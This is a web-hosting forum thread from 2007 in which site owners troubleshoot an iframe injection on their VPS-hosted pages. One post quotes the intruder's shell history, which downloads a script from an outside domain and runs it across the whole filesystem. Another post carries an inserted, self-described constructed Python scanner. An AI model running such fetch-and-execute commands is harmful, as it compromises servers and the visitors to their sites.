This is a discussion on Another hacker attack in the VPS & Dedicated forum

  1. #1
    Jag Veteran EuroNut's Avatar
    Join Date
    Aug 2007
    Location
    UK
    Posts
    529

    Another hacker attack

    Yesterday I happened to check on one of my sites and all hell broke loose

    Firefox minimized and up popped a small window telling me my PC was infested with porn, virus and spyware files and that I should download and run a cleaner to de-infest it.

    I'm not one to fall for such silly tricks so I went back to my site to take a look at the source code - There, right underneath the <body> tag was a new piece of IFRAME code pointing to a php script on another web site containing an affiliate reference of RAZEK (I'm deliberately not posting the whole code here, but there's enough info above for you to take a look at your own site(s) to see if he's hit you too).

    It turned out that he'd hit about 12 of my sites - Originally I thought it was only Joomla sites affected, but a couple that are just plain html had also been hit. This is all on a cPanel VPS running CentOS. A quick Google sees this attack showing up elsewhere, and on Wordpress and phpBB sites too.

    Has anyone come across this before? If so, how did he get onto your site to make the changes?

    I've previously worked through the JagPC security FAQ, got register_globals turned off, set important files to permission 644 etc, and various other measures they suggest. Unfortunately, I didn't have "save raw access logs" turned on so I can't go back this time to see how he got in. (I've got the logs being saved and backed up now, but it's a bit late for this time around).

    Any clues / ideas / suggestions / previous experiences folks?
    EuroNut (The mad Brit)
    If it ain't broke, don't ping it...

  2. #2
    JPC Addict lloyd_borrett's Avatar
    Join Date
    May 2004
    Location
    Melbourne, Australia
    Posts
    132
    I've been getting this same sort of attack across a number of my JaguarPC accounts over the last few days. I still haven't found how they are getting in.

    Any suggestions?

  3. #3
    the Windlord Gwaihir's Avatar
    Join Date
    Jun 2002
    Posts
    2,562
    Quote Originally Posted by lloyd_borrett View Post
    Any suggestions?
    Search webhostingtalk? If it's well beyond JagPC, folks are likely to be posting about it there too.
    Regards,

    Wim Heemskerk

  4. #4
    eks
    JPC Member
    Join Date
    Mar 2003
    Posts
    4
    I had the same attack happen on my VPS on the 13th and another one yesterday.

    They were able to log on as root via SSH from IPs 83.149.87.156 & 84.244.174.54. They then executed a script that went through all the files in the server and added the malicious code snippet to any HTML page found.

    The .bash_history file in root home folder shows the commands they executed:

    wget http://www.donefind.com/frame.sh
    wget http://www.donefind.com/frame.htm
    chmod 777 ./frame.sh
    ./frame.sh frame.htm /
    rm -f ./frame.sh
    who -a


    Per JagPC, "have your developer audit(sic?) your code and make scripts more secure". So, I would like to ask those of you who sustained these recent attacks to list your installations and perhaps find a commonality.

    These are the following that are installed across the several sites I host:
    WordPress 2.1.3 with Akismet 2.0 and WP-Polls 2.14 (AJAX)
    phpBB 3 RC5
    Mantis Bug Tracker 1.0.8
    DokuWiki 2007-06-26
    Last edited by eks; 09-19-2007 at 02:08 PM. Reason: added more info
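    As an added, constructed example (not code from this thread, from JaguarPC or from any poster), here is a small defender-side scanner for the injection eks and EuroNut describe: an iframe inserted directly under the <body> tag of every HTML page on the server. The document root, the sample pages and the "evil.example" URL are assumptions, not values from the thread.

```python
import re
import tempfile
from pathlib import Path
from typing import Dict, List

# Hypothetical detection helper written for this thread, not a JaguarPC or forum tool.
# The posts describe an <iframe> inserted right after the <body> tag, so the scanner
# looks for an iframe within a short window after each <body ...> tag.
BODY_TAG = re.compile(r"<body\b[^>]*>", re.IGNORECASE)
IFRAME_TAG = re.compile(r"<iframe\b[^>]*\bsrc\s*=\s*[\"']?([^\"'\s>]+)", re.IGNORECASE)
WEB_EXTENSIONS = {".html", ".htm", ".php", ".shtml"}

def find_injected_iframes(text: str, window: int = 300) -> List[str]:
    """Return the src values of iframes that appear within `window` chars after <body>."""
    hits = []
    for body in BODY_TAG.finditer(text):
        region = text[body.end(): body.end() + window]
        for frame in IFRAME_TAG.finditer(region):
            hits.append(frame.group(1))
    return hits

def scan_webroot(root: str) -> Dict[str, List[str]]:
    """Walk a document root; map each suspicious file to the iframe src values found."""
    findings = {}
    for path in Path(root).rglob("*"):
        if path.suffix.lower() not in WEB_EXTENSIONS or not path.is_file():
            continue
        try:
            text = path.read_text(errors="replace")
        except OSError:
            continue  # unreadable file, skip rather than abort the whole scan
        srcs = find_injected_iframes(text)
        if srcs:
            findings[str(path.relative_to(root))] = srcs
    return findings

# Constructed sample pages so the example runs offline; the iframe URL is a placeholder.
CLEAN_PAGE = "<html><body>\n<p>this domain does not have a web site</p>\n</body></html>\n"
INJECTED_PAGE = (
    "<html><body>\n"
    '<iframe src="http://evil.example/frame.php?ref=PLACEHOLDER" width="1" height="1"></iframe>\n'
    "<p>this domain does not have a web site</p>\n</body></html>\n"
)

def demo() -> Dict[str, List[str]]:
    """Write the samples into a temporary tree and scan it."""
    with tempfile.TemporaryDirectory() as root:
        Path(root, "index.html").write_text(INJECTED_PAGE)
        Path(root, "about").mkdir()
        Path(root, "about", "index.htm").write_text(CLEAN_PAGE)
        Path(root, "notes.txt").write_text(INJECTED_PAGE)  # not a web file, ignored
        return scan_webroot(root)

if __name__ == "__main__":
    for page, srcs in demo().items():
        print(f"{page}: {', '.join(srcs)}")
```

    Point scan_webroot at the real document root to list pages carrying an iframe under <body>; the reported src values are what to compare against the affiliate-reference pattern EuroNut mentions.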

  5. #5
    JPC Addict lloyd_borrett's Avatar
    Join Date
    May 2004
    Location
    Melbourne, Australia
    Posts
    132
    I'm being constantly hacked on three different accounts right now. The only common open source application across all three accounts is mySQLdumper.

    Best Regards, Lloyd Borrett.

  6. #6
    Jag Veteran EuroNut's Avatar
    Join Date
    Aug 2007
    Location
    UK
    Posts
    529
    Quote Originally Posted by Gwaihir View Post
    Search webhostingtalk? If it's well beyond JagPC, folks are likely to be posting about it there too.
    Well I'm researching like mad, on WHT and elsewhere, but as yet I haven't found a common factor to help pin this down.

    Take all the following with a large pinch of salt and try not to draw conclusions, because they simply don't tie together to give any real answers. Here's a few of the "facts" I've found so far:

    1) It's a Windows 2003 Server (SP2) exploit
    2) It's an exploit in the latest cPanel (But 10,000 sites in Europe got attacked some months ago before the current cPanel came out)
    3) It only happens on Fedora machines
    4) It also happens on CentOS machines
    5) It's a keystroke logger which captures your banking info and the root password to your server, and that is then used to run a server-wide insert on all index.* files

    The list goes on and on, so I regret to report that I have absolutely ZILCH to report so far. (But I'm still looking!!)

    (Note: The facts above are only facts until replaced by other facts with later sell-by dates)

    I'll let you know when I get something even slightly useful.
    EuroNut (The mad Brit)
    If it ain't broke, don't ping it...

  7. #7
    Jag Veteran EuroNut's Avatar
    Join Date
    Aug 2007
    Location
    UK
    Posts
    529
    Quote Originally Posted by eks View Post

    They were able to log on as root via SSH .... They then executed a script
    That's my favourite suspect right now, but still looking ....

    Quote Originally Posted by eks View Post
    These are the following that are installed across the several sites I host:
    WordPress 2.1.3 with Akismet 2.0 and WP-Polls 2.14 (AJAX)
    phpBB 3 RC5
    Mantis Bug Tracker 1.0.8
    DokuWiki 2007-06-26
    Mine were Joomla 1.0.13 sites, and totally vanilla HTML pages on other sites. The wide range of sites catching this monkey suggests to me that it's not a vulnerability in any particular script - In fact, I have a domain with a mini web page, which comprises 4 lines of HTML, saying "this domain does not have a web site" and THAT got hacked!
    EuroNut (The mad Brit)
    If it ain't broke, don't ping it...

  8. #8
    Jag Veteran EuroNut's Avatar
    Join Date
    Aug 2007
    Location
    UK
    Posts
    529

    Let's move to the other thread

    I think it might be useful if we carry on with this over in:

    Hacker Attack

    Masood is on the case, and having all the feedback on this in one place might be a big help.
    EuroNut (The mad Brit)
    If it ain't broke, don't ping it...

  9. #9
    Ron
    Loyal Client
    Join Date
    Aug 2002
    Posts
    7,312
    Just to clarify in this thread--- it's NOT a keystroke logger at all, right???
    Good luck

  10. #10
    all about nothing! Frank Broughton's Avatar
    Join Date
    Jan 2006
    Posts
    2,158
    Seems not Ron -> sniffing passwords from FTP somehow...

  11. #11
    Old Hillbilly Connie's Avatar
    Join Date
    Sep 2001
    Location
    Hills of Missouri
    Posts
    2,648
    I closed this thread because there is a thread going on at Hacker Attack in regard to this issue. Two threads on the same problem is not helpful.

    Forum Moderators - Jag Staff

